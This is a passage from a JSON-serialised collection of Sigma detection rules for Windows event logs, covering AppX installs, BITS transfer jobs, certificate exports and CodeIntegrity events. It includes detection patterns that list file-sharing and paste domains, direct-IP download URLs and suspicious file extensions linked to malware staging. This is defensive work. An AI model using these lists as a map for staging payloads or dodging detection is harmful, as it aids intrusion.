1 of filter_optional_*\nfalsepositives:\n    - Legitimate application installations that the filters do not cover can generate false positives, thus baselining and tuning is recommended before deploying to production\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/appxdeployment_server/win_appxpackaging_server_unsigned_package_installation.yml",
    "content": "title: Windows AppX Deployment Unsigned Package Installation\nid: 9a025188-6f2d-42f8-bb2f-d3a83d24a5af\nrelated:\n    - id: 37651c2a-42cd-4a69-ae0d-22a4349aa04a\n      type: similar\n    - id: 975b2262-9a49-439d-92a6-0709cccdf0b2\n      type: similar\nstatus: experimental\ndescription: Detects attempts to install unsigned MSIX/AppX packages using the -AllowUnsigned parameter via AppXDeployment-Server events\nreferences:\n    - https://docs.microsoft.com/en-us/powershell/module/appx/add-appxpackage\n    - https://www.splunk.com/en_us/blog/security/msix-weaponization-threat-detection-splunk.html\nauthor: Michael Haag, Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-11-03\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1204.002\n    - attack.t1553.005\nlogsource:\n    product: windows\n    service: appxdeployment-server\ndetection:\n    selection:\n        EventID: 603\n        Flags: '8388608'\n    condition: selection\nfalsepositives:\n    - Legitimate installation of unsigned packages for legitimate purposes such as development or testing\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/appxpackaging_om/win_appxpackaging_om_sups_appx_signature.yml",
    "content": "title: Suspicious Digital Signature Of AppX Package\nid: b5aa7d60-c17e-4538-97de-09029d6cd76b\nstatus: test\ndescription: Detects execution of AppX packages with known suspicious or malicious signature\nreferences:\n    - Internal Research\n    - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-16\ntags:\n    - attack.defense-evasion\n    - attack.execution\nlogsource:\n    product: windows\n    service: appxpackaging-om\ndetection:\n    selection:\n        EventID: 157\n        # Add more known suspicious/malicious certificates used in different attacks\n        subjectName: 'CN=Foresee Consulting Inc., O=Foresee Consulting Inc., L=North York, S=Ontario, C=CA, SERIALNUMBER=1004913-1, OID.1.3.6.1.4.1.311.60.2.1.3=CA, OID.2.5.4.15=Private Organization'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/bits_client/win_bits_client_new_job_via_bitsadmin.yml",
    "content": "title: New BITS Job Created Via Bitsadmin\nid: 1ff315dc-2a3a-4b71-8dde-873818d25d39\nstatus: test\ndescription: Detects the creation of a new bits job by Bitsadmin\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md\nauthor: frack113\ndate: 2022-03-01\nmodified: 2023-03-27\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1197\nlogsource:\n    product: windows\n    service: bits-client\ndetection:\n    selection:\n        EventID: 3\n        processPath|endswith: '\\bitsadmin.exe'\n    condition: selection\nfalsepositives:\n    - Many legitimate applications or scripts could leverage \"bitsadmin\". This event is best correlated with EID 16403 via the JobID field\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/bits_client/win_bits_client_new_job_via_powershell.yml",
    "content": "title: New BITS Job Created Via PowerShell\nid: fe3a2d49-f255-4d10-935c-bda7391108eb\nstatus: test\ndescription: Detects the creation of a new bits job by PowerShell\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md\nauthor: frack113\ndate: 2022-03-01\nmodified: 2023-03-27\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1197\nlogsource:\n    product: windows\n    service: bits-client\ndetection:\n    selection:\n        EventID: 3\n        processPath|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n    condition: selection\nfalsepositives:\n    - Administrator PowerShell scripts\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/bits_client/win_bits_client_new_transfer_saving_susp_extensions.yml",
    "content": "title: BITS Transfer Job Downloading File Potential Suspicious Extension\nid: b85e5894-9b19-4d86-8c87-a2f3b81f0521\nstatus: test\ndescription: Detects new BITS transfer job saving local files with potential suspicious extensions\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md\nauthor: frack113\ndate: 2022-03-01\nmodified: 2023-03-27\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1197\nlogsource:\n    product: windows\n    service: bits-client\ndetection:\n    selection:\n        EventID: 16403\n        LocalName|endswith:\n            # TODO: Extend this list with more interesting file extensions\n            - '.bat'\n            - '.dll'\n            - '.exe' # TODO: Might wanna comment this if it generates tons of FPs\n            - '.hta'\n            - '.ps1'\n            - '.psd1'\n            - '.sh'\n            - '.vbe'\n            - '.vbs'\n    filter_optional_generic:\n        # Typical updates: Chrome, Dropbox etc.\n        LocalName|contains: '\\AppData\\'\n        RemoteName|contains: '.com'\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - While the file extensions in question can be suspicious at times, it's best to add filters according to your environment to avoid a large amount of false positives\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/bits_client/win_bits_client_new_transfer_via_file_sharing_domains.yml",
    "content": "title: BITS Transfer Job Download From File Sharing Domains\nid: d635249d-86b5-4dad-a8c7-d7272b788586\nstatus: test\ndescription: Detects BITS transfer job downloading files from a file sharing domain.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md\n    - https://twitter.com/malmoeb/status/1535142803075960832\n    - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker\n    - https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-06-28\nmodified: 2025-12-10\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1197\nlogsource:\n    product: windows\n    service: bits-client\ndetection:\n    selection:\n        EventID: 16403\n        RemoteName|contains:\n            - '.githubusercontent.com'       # Includes both gists and github repositories / Michael Haag (idea)\n            - 'anonfiles.com'\n            - 'cdn.discordapp.com'\n            - 'ddns.net'\n            - 'dl.dropboxusercontent.com'\n            - 'ghostbin.co'\n            - 'github.com'\n            - 'glitch.me'\n            - 'gofile.io'\n            - 'hastebin.com'\n            - 'mediafire.com'\n            - 'mega.nz'\n            - 'onrender.com'\n            - 'pages.dev'\n            - 'paste.ee'\n            - 'pastebin.com'\n            - 'pastebin.pl'\n            - 'pastetext.net'\n            - 'pixeldrain.com'\n            - 'privatlab.com'\n            - 'privatlab.net'\n            - 'send.exploit.in'\n            - 'sendspace.com'\n            - 'storage.googleapis.com'\n            - 'storjshare.io'\n            - 'supabase.co'\n            - 'temp.sh'\n            - 'transfer.sh'\n            - 'trycloudflare.com'\n            - 'ufile.io'\n            - 'w3spaces.com'\n            - 'workers.dev'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/bits_client/win_bits_client_new_transfer_via_ip_address.yml",
    "content": "title: BITS Transfer Job Download From Direct IP\nid: 90f138c1-f578-4ac3-8c49-eecfd847c8b7\nrelated:\n    - id: 99c840f2-2012-46fd-9141-c761987550ef\n      type: similar\nstatus: test\ndescription: Detects a BITS transfer job downloading file(s) from a direct IP address.\nreferences:\n    - https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin\n    - https://isc.sans.edu/diary/22264\n    - https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/\n    - https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-11\nmodified: 2023-03-27\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1197\nlogsource:\n    product: windows\n    service: bits-client\ndetection:\n    selection:\n        EventID: 16403\n        RemoteName|contains:\n            - 'http://1'\n            - 'http://2'\n            - 'http://3'\n            - 'http://4'\n            - 'http://5'\n            - 'http://6'\n            - 'http://7'\n            - 'http://8'\n            - 'http://9'\n            - 'https://1'\n            - 'https://2'\n            - 'https://3'\n            - 'https://4'\n            - 'https://5'\n            - 'https://6'\n            - 'https://7'\n            - 'https://8'\n            - 'https://9'\n    filter_optional_local_networks:\n        RemoteName|contains:\n            - '://10.' # 10.0.0.0/8\n            - '://192.168.' # 192.168.0.0/16\n            - '://172.16.' # 172.16.0.0/12\n            - '://172.17.'\n            - '://172.18.'\n            - '://172.19.'\n            - '://172.20.'\n            - '://172.21.'\n            - '://172.22.'\n            - '://172.23.'\n            - '://172.24.'\n            - '://172.25.'\n            - '://172.26.'\n            - '://172.27.'\n            - '://172.28.'\n            - '://172.29.'\n            - '://172.30.'\n            - '://172.31.'\n            - '://127.' # 127.0.0.0/8\n            - '://169.254.' # 169.254.0.0/16\n    filter_optional_seven_zip:\n        RemoteName|contains:\n            # For https://7-zip.org/\n            - 'https://7-'\n            - 'http://7-'\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/bits_client/win_bits_client_new_transfer_via_uncommon_tld.yml",
    "content": "title: BITS Transfer Job With Uncommon Or Suspicious Remote TLD\nid: 6d44fb93-e7d2-475c-9d3d-54c9c1e33427\nstatus: test\ndescription: Detects a suspicious download using the BITS client from a FQDN that is unusual. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md\n    - https://twitter.com/malmoeb/status/1535142803075960832\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-06-10\nmodified: 2025-02-28\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1197\nlogsource:\n    product: windows\n    service: bits-client\ndetection:\n    selection:\n        EventID: 16403\n    filter_main_generic:\n        RemoteName|contains:\n            - '.azureedge.net/'\n            - '.com/'\n            - '.sfx.ms/'\n            - 'download.mozilla.org/' # https://download.mozilla.org/?product=firefox-101.0.1-partial-101.0&amp;os=win64&amp;lang=en-US\n            - 'cdn.onenote.net/'\n            - 'cdn.office.net/'\n            - 'tscdn.m365.static.microsoft/'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - This rule doesn't exclude other known TLDs such as \".org\" or \".net\". It's recommended to apply additional filters for software and scripts that leverage the BITS service\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/bits_client/win_bits_client_new_trasnfer_susp_local_folder.yml",
    "content": "title: BITS Transfer Job Download To Potential Suspicious Folder\nid: f8a56cb7-a363-44ed-a82f-5926bb44cd05\nstatus: test\ndescription: Detects new BITS transfer job where the LocalName/Saved file is stored in a potentially suspicious location\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-06-28\nmodified: 2023-03-27\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1197\nlogsource:\n    product: windows\n    service: bits-client\ndetection:\n    selection:\n        EventID: 16403\n        LocalName|contains:\n            # TODO: Add more interesting suspicious paths\n            - '\\Desktop\\'\n            - 'C:\\Users\\Public\\'\n            - 'C:\\PerfLogs\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/capi2/win_capi2_acquire_certificate_private_key.yml",
    "content": "title: Certificate Private Key Acquired\nid: e2b5163d-7deb-4566-9af3-40afea6858c3\nstatus: test\ndescription: Detects when an application acquires a certificate private key\nreferences:\n    - https://www.splunk.com/en_us/blog/security/breaking-the-chain-defending-against-certificate-services-abuse.html\nauthor: Zach Mathis\ndate: 2023-05-13\ntags:\n    - attack.credential-access\n    - attack.t1649\nlogsource:\n    product: windows\n    service: capi2\n    definition: 'Requirements: The CAPI2 Operational log needs to be enabled'\ndetection:\n    selection:\n        EventID: 70 # Acquire Certificate Private Key\n    condition: selection\nfalsepositives:\n    - Legitimate application requesting certificate exports will trigger this. Apply additional filters as needed\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/certificate_services_client_lifecycle_system/win_certificateservicesclient_lifecycle_system_cert_exported.yml",
    "content": "title: Certificate Exported From Local Certificate Store\nid: 58c0bff0-40a0-46e8-b5e8-b734b84d2017\nstatus: test\ndescription: Detects when an application exports a certificate (and potentially the private key as well) from the local Windows certificate store.\nreferences:\n    - https://www.splunk.com/en_us/blog/security/breaking-the-chain-defending-against-certificate-services-abuse.html\nauthor: Zach Mathis\ndate: 2023-05-13\ntags:\n    - attack.credential-access\n    - attack.t1649\nlogsource:\n    product: windows\n    service: certificateservicesclient-lifecycle-system\ndetection:\n    selection:\n        EventID: 1007 # A certificate has been exported\n    condition: selection\nfalsepositives:\n    - Legitimate application requesting certificate exports will trigger this. Apply additional filters as needed\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/code_integrity/win_codeintegrity_attempted_dll_load.yml",
    "content": "title: CodeIntegrity - Unmet Signing Level Requirements By File Under Validation\nid: f8931561-97f5-4c46-907f-0a4a592e47a7\nstatus: experimental\ndescription: |\n    Detects attempted file load events that did not meet the signing level requirements. It often means the file's signature is revoked or a signature with the Lifetime Signing EKU has expired.\n    This event is best correlated with EID 3089 to determine the error of the validation.\nreferences:\n    - https://twitter.com/SBousseaden/status/1483810148602814466\n    - https://github.com/MicrosoftDocs/windows-itpro-docs/blob/40fe118976734578f83e5e839b9c63ae7a4af82d/windows/security/threat-protection/windows-defender-application-control/event-id-explanations.md#windows-codeintegrity-operational-log\n    - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations\n    - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-01-20\nmodified: 2025-02-28\ntags:\n    - attack.execution\nlogsource:\n    product: windows\n    service: codeintegrity-operational\ndetection:\n    selection:\n        EventID:\n            - 3033 # Code Integrity determined that a process (%4) attempted to load %2 that did not meet the %5 signing level requirements.\n            - 3034 # Code Integrity determined that a process (%4) attempted to load %2 that did not meet the %5 signing level requirements or violated code integrity policy. 
However, due to code integrity auditing policy, the image was allowed to load.\n    filter_optional_dtrace:\n        # Example: Code Integrity determined that a process (\\Device\\HarddiskVolume5\\Windows\\System32\\svchost.exe) attempted to load \\Device\\HarddiskVolume5\\Program Files\\DTrace\\dtrace.dll that did not meet the Windows signing level requirements.\n        FileNameBuffer|endswith: '\\Program Files\\DTrace\\dtrace.dll'\n        ProcessNameBuffer|endswith: '\\Windows\\System32\\svchost.exe'\n        RequestedPolicy: 12\n    filter_optional_av_generic:\n        # Example: Code Integrity determined that a process (\\Device\\HarddiskVolume5\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2207.7-0\\MsMpEng.exe) attempted to load \\Device\\HarddiskVolume5\\Windows\\System32\\DriverStore\\FileRepository\\iigd_dch.inf_amd64_36fb67bd6dbd887d\\igd10iumd64.dll that did not meet the Custom 3 / Antimalware signing level requirements.\n        FileNameBuffer|contains: '\\Windows\\System32\\DriverStore\\FileRepository\\'\n        FileNameBuffer|endswith: '\\igd10iumd64.dll'\n        # ProcessNameBuffer is AV products\n        RequestedPolicy: 7\n    filter_optional_electron_based_app:\n        # Example: Code Integrity determined that a process (\\Device\\HarddiskVolume5\\Users\\user\\AppData\\Local\\Keybase\\Gui\\Keybase.exe) attempted to load \\Device\\HarddiskVolume5\\Windows\\System32\\nvspcap64.dll that did not meet the Microsoft signing level requirements.\n        FileNameBuffer|endswith: '\\Windows\\System32\\nvspcap64.dll'\n        ProcessNameBuffer|endswith:\n            - '\\AppData\\Local\\Keybase\\Gui\\Keybase.exe'\n            - '\\Microsoft\\Teams\\stage\\Teams.exe'\n        RequestedPolicy: 8\n    filter_optional_bonjour:\n        FileNameBuffer|endswith: '\\Program Files\\Bonjour\\mdnsNSP.dll'\n        ProcessNameBuffer|endswith:\n            - '\\Windows\\System32\\svchost.exe'\n            - '\\Windows\\System32\\SIHClient.exe'\n        
RequestedPolicy:\n            - 8\n            - 12\n    filter_optional_msoffice_1:\n        FileNameBuffer|contains: '\\Microsoft Office\\root\\vfs\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE'\n        FileNameBuffer|endswith: '\\MSOXMLMF.DLL'\n        # ProcessNameBuffer is AV products\n        RequestedPolicy: 7\n    filter_optional_msoffice_2:\n        ProcessNameBuffer|contains: '\\Program Files\\Microsoft Office\\root\\vfs\\ProgramFilesCommonX64\\Microsoft Shared\\Office'\n        FileNameBuffer|contains: '\\Windows\\System32\\'\n        RequestedPolicy: 8\n    filter_optional_slack:\n        # Example: https://user-images.githubusercontent.com/112784902/197407680-96d4b662-8a59-4289-a483-b24d630ac2a9.png\n        # Even though it's the same DLL as the one used in the electron based app filter. We need to do a separate selection due to slack's folder naming convention with the version number :)\n        FileNameBuffer|endswith: '\\Windows\\System32\\nvspcap64.dll'\n        ProcessNameBuffer|contains: '\\AppData\\Local\\slack\\app-'\n        ProcessNameBuffer|endswith: '\\slack.exe'\n        RequestedPolicy: 8\n    filter_optional_firefox:\n        # Example: https://user-images.githubusercontent.com/62423083/197451483-70e89010-ed96-4357-8079-b5a061a239d6.png\n        FileNameBuffer|endswith:\n            - '\\Mozilla Firefox\\mozavcodec.dll'\n            - '\\Mozilla Firefox\\mozavutil.dll'\n        ProcessNameBuffer|endswith: '\\Mozilla Firefox\\firefox.exe'\n        RequestedPolicy: 8\n    filter_optional_avast:\n        FileNameBuffer|endswith:\n            - '\\Program Files\\Avast Software\\Avast\\aswAMSI.dll'\n            - '\\Program Files (x86)\\Avast Software\\Avast\\aswAMSI.dll'\n        RequestedPolicy:\n            - 8\n            - 12\n    filter_main_gac:\n        # Filtering the path containing this string because of multiple possible DLLs in that location\n        FileNameBuffer|contains: '\\Windows\\assembly\\GAC\\'\n        
ProcessNameBuffer|endswith: '\\mscorsvw.exe'\n        ProcessNameBuffer|contains: '\\Windows\\Microsoft.NET\\'\n        RequestedPolicy: 8\n    filter_optional_google_drive:\n        # Example: \\Program Files\\Google\\Drive File Stream\\67.0.2.0\\crashpad_handler.exe\n        FileNameBuffer|contains: '\\Program Files\\Google\\Drive File Stream\\'\n        FileNameBuffer|endswith: '\\crashpad_handler.exe'\n        ProcessNameBuffer|endswith: '\\Windows\\ImmersiveControlPanel\\SystemSettings.exe'\n        RequestedPolicy: 8\n    filter_optional_trend_micro:\n        FileNameBuffer|endswith: '\\Trend Micro\\Client Server Security Agent\\perficrcperfmonmgr.dll'\n        RequestedPolicy: 8\n    filter_optional_mdns_responder:\n        # No trailing space in the value: an 'endswith' value ending in a space never matches a real file path\n        FileNameBuffer|endswith: '\\Program Files\\National Instruments\\Shared\\mDNS Responder\\nimdnsNSP.dll'\n    filter_optional_mcafee:\n        FileNameBuffer|endswith:\n            - '\\Program Files\\McAfee\\Endpoint Security\\Threat Prevention\\MfeAmsiProvider.dll'\n            - '\\Program Files\\McAfee\\MfeAV\\AMSIExt.dll'\n    filter_optional_eset:\n        FileNameBuffer|endswith: '\\Program Files\\ESET\\ESET Security\\eamsi.dll'\n    filter_optional_comodo:\n        FileNameBuffer|endswith: '\\Program Files\\comodo\\comodo internet security\\amsiprovider_x64.dll'\n    filter_optional_sentinel_one:\n        # Example: program files\\sentinelone\\sentinel agent 23.4.4.223\\inprocessclient64.dll\n        - FileNameBuffer|contains: '\\Program Files\\SentinelOne\\Sentinel Agent'\n        # Example: Program Files\\SentinelOne\\Sentinel Agent 23.4.4.223\\SentinelAgent.exe\n        - ProcessNameBuffer|contains: '\\Program Files\\SentinelOne\\Sentinel Agent'\n    filter_optional_national_instruments:\n        # Example: \\device\\harddiskvolume3\\program files\\national instruments\\shared\\mdns responder\\nimdnsnsp.dll\n        FileNameBuffer|contains: '\\National Instruments\\Shared\\mDNS Responder\\'\n    filter_optional_kaspersky:\n     
   # Example: \\Program Files (x86)\\Kaspersky Lab\\Kaspersky Endpoint Security for Windows\\x64\\antimalware_provider.dll\n        - ProcessNameBuffer|contains|all:\n              - '\\Kaspersky Lab\\'\n              - '\\avp.exe'\n        - FileNameBuffer|contains|all:\n              - '\\Kaspersky Lab\\'\n              - '\\antimalware_provider.dll'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Antivirus and other third party products are known to trigger this rule quite a lot. Initial filtering and tuning are required before using this rule.\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/code_integrity/win_codeintegrity_blocked_protected_process_file.yml",
    "content": "title: CodeIntegrity - Disallowed File For Protected Processes Has Been Blocked\nid: 5daf11c3-022b-4969-adb9-365e6c078c7c\nstatus: test\ndescription: Detects block events for files that are disallowed by code integrity for protected processes\nreferences:\n    - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations\n    - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-06\ntags:\n    - attack.privilege-escalation\nlogsource:\n    product: windows\n    service: codeintegrity-operational\ndetection:\n    selection:\n        EventID: 3104 # Windows blocked file %2 which has been disallowed for protected processes.\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/code_integrity/win_codeintegrity_enforced_policy_block.yml",
    "content": "title: CodeIntegrity - Blocked Image/Driver Load For Policy Violation\nid: e4be5675-4a53-426a-8c81-a8bb2387e947\nstatus: test\ndescription: Detects blocked load events that did not meet the authenticode signing level requirements or violated the code integrity policy.\nreferences:\n    - https://twitter.com/wdormann/status/1590434950335320065\n    - https://github.com/MicrosoftDocs/windows-itpro-docs/blob/40fe118976734578f83e5e839b9c63ae7a4af82d/windows/security/threat-protection/windows-defender-application-control/event-id-explanations.md#windows-codeintegrity-operational-log\n    - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-11-10\nmodified: 2023-06-07\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1543\nlogsource:\n    product: windows\n    service: codeintegrity-operational\ndetection:\n    selection:\n        EventID: 3077 # Code Integrity determined that a process (%4) attempted to load %2 that did not meet the %5 signing level requirements or violated code integrity policy (Policy ID:%XX).\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/code_integrity/win_codeintegrity_revoked_driver_blocked.yml",
    "content": "title: CodeIntegrity - Blocked Driver Load With Revoked Certificate\nid: 9b72b82d-f1c5-4632-b589-187159bc6ec1\nstatus: test\ndescription: Detects blocked load attempts of revoked drivers\nreferences:\n    - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations\n    - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-06\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1543\nlogsource:\n    product: windows\n    service: codeintegrity-operational\ndetection:\n    selection:\n        EventID: 3023 # The driver %2 is blocked from loading as the driver has been revoked by Microsoft.\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/code_integrity/win_codeintegrity_revoked_driver_loaded.yml",
    "content": "title: CodeIntegrity - Revoked Kernel Driver Loaded\nid: 320fccbf-5e32-4101-82b8-2679c5f007c6\nstatus: test\ndescription: Detects the load of a revoked kernel driver\nreferences:\n    - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations\n    - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-06\ntags:\n    - attack.privilege-escalation\nlogsource:\n    product: windows\n    service: codeintegrity-operational\ndetection:\n    selection:\n        EventID:\n            - 3021 # Code Integrity determined a revoked kernel module %2 is loaded into the system.  Check with the publisher to see if a new signed version of the kernel module is available.\n            - 3022 # Code Integrity determined a revoked kernel module %2 is loaded into the system. The image is allowed to load because kernel mode debugger is attached.\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/code_integrity/win_codeintegrity_revoked_image_blocked.yml",
    "content": "title: CodeIntegrity - Blocked Image Load With Revoked Certificate\nid: 6f156c48-3894-4952-baf0-16193e9067d2\nstatus: test\ndescription: Detects blocked image load events with revoked certificates by code integrity.\nreferences:\n    - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations\n    - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-06\ntags:\n    - attack.privilege-escalation\nlogsource:\n    product: windows\n    service: codeintegrity-operational\ndetection:\n    selection:\n        EventID: 3036 # Windows is unable to verify the integrity of the file %2 because the signing certificate has been revoked.  Check with the publisher to see if a new signed version of the kernel module is available.\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/code_integrity/win_codeintegrity_revoked_image_loaded.yml",
    "content": "title: CodeIntegrity - Revoked Image Loaded\nid: 881b7725-47cc-4055-8000-425823344c59\nstatus: test\ndescription: Detects image load events with revoked certificates by code integrity.\nreferences:\n    - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations\n    - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-06\ntags:\n    - attack.privilege-escalation\nlogsource:\n    product: windows\n    service: codeintegrity-operational\ndetection:\n    selection:\n        EventID:\n            - 3032 # Code Integrity determined a revoked image %2 is loaded into the system. Check with the publisher to see if a new signed version of the image is available.\n            - 3035 # Code Integrity determined a revoked image %2 is loaded into the system. The image is allowed to load because kernel mode debugger is attached.\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/code_integrity/win_codeintegrity_unsigned_driver_loaded.yml",
    "content": "title: CodeIntegrity - Unsigned Kernel Module Loaded\nid: 951f8d29-f2f6-48a7-859f-0673ff105e6f\nstatus: test\ndescription: Detects the presence of a loaded unsigned kernel module on the system.\nreferences:\n    - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations\n    - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-06\ntags:\n    - attack.privilege-escalation\nlogsource:\n    product: windows\n    service: codeintegrity-operational\ndetection:\n    selection:\n        EventID: 3001 # Code Integrity determined an unsigned kernel module %2 is loaded into the system. Check with the publisher to see if a signed version of the kernel module is available\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/code_integrity/win_codeintegrity_unsigned_image_loaded.yml",
    "content": "title: CodeIntegrity - Unsigned Image Loaded\nid: c92c24e7-f595-493f-9c98-53d5142f5c18\nstatus: test\ndescription: Detects loaded unsigned image on the system\nreferences:\n    - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations\n    - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-06\ntags:\n    - attack.privilege-escalation\nlogsource:\n    product: windows\n    service: codeintegrity-operational\ndetection:\n    selection:\n        EventID: 3037 # Code Integrity determined an unsigned image %2 is loaded into the system. Check with the publisher to see if a signed version of the image is available.\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/code_integrity/win_codeintegrity_whql_failure.yml",
    "content": "title: CodeIntegrity - Unmet WHQL Requirements For Loaded Kernel Module\nid: 2f8cd7a0-9d5a-4f62-9f8b-2c951aa0dd1f\nstatus: test\ndescription: Detects loaded kernel modules that did not meet the WHQL signing requirements.\nreferences:\n    - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations\n    - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-06\nmodified: 2023-06-14\ntags:\n    - attack.privilege-escalation\nlogsource:\n    product: windows\n    service: codeintegrity-operational\ndetection:\n    selection:\n        EventID:\n            - 3082 # Code Integrity determined kernel module %2 that did not meet the WHQL requirements is loaded into the system. However, due to code integrity auditing policy, the image was allowed to load\n            - 3083 # Code Integrity determined kernel module %2 that did not meet the WHQL requirements is loaded into the system. Check with the publisher to see if a WHQL compliant kernel module is available\n    filter_optional_vmware:\n       